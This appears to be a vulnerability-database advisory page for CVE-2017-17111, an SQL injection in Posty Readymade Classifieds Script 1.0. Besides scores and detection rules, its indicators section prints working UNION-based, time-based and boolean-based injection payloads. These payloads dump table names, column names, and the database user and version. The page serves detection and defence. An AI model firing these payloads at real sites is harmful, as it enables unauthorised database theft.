cbcvebase.
CVE-2017-17111
published 2017-12-11

CVE-2017-17111: Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.

PriorityP263critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
8.80%
94.5th percentile
Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.

Affected

1 ranges
VendorProductVersion rangeFixed in
scubezposty_readymade_classifieds

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://server/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+-
urlhttp://server/ads-details.php?ID=-265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+-
path/listings.php
path/ads-details.php
commandcatid=' AND SLEEP(5)-- tCbs
commandcatid=-7326' OR 9205=9205#
commandID=265 AND SLEEP(5)
commandID=-5939 UNION ALL SELECT NULL,NULL,CONCAT(0x716a626271,0x664f68565771437a5444554e794f547462774e65574f43616b767945464c416d524b646f48675a67,0x71787a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZIaY
  • Monitor GET requests to listings.php with a 'catid' parameter containing SQL injection patterns, particularly MySQL-specific inline comment syntax /*!08888...*/ and UNION-based payloads.
  • Monitor GET requests to ads-details.php with an 'ID' parameter containing SQL injection patterns, including UNION SELECT, SLEEP(), and boolean-based blind payloads.
  • Detect use of MySQL versioned comment obfuscation token '/*!08888' in HTTP query strings, which is a distinctive fingerprint of this exploit's payloads.
  • Detect time-based blind SQLi attempts via SLEEP(5) in the catid or ID GET parameters.
  • The UNION-based payload for ads-details.php uses exactly 26 columns; detect anomalous UNION SELECT statements with a large number of NULL columns in the ID parameter.
  • ·The exploit targets Posty Readymade Classifieds Script version 1.0 only; later versions may not be affected.
  • ·The exploit was tested on Windows 7 x64 and Kali Linux x64; behavior on other platforms may differ.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.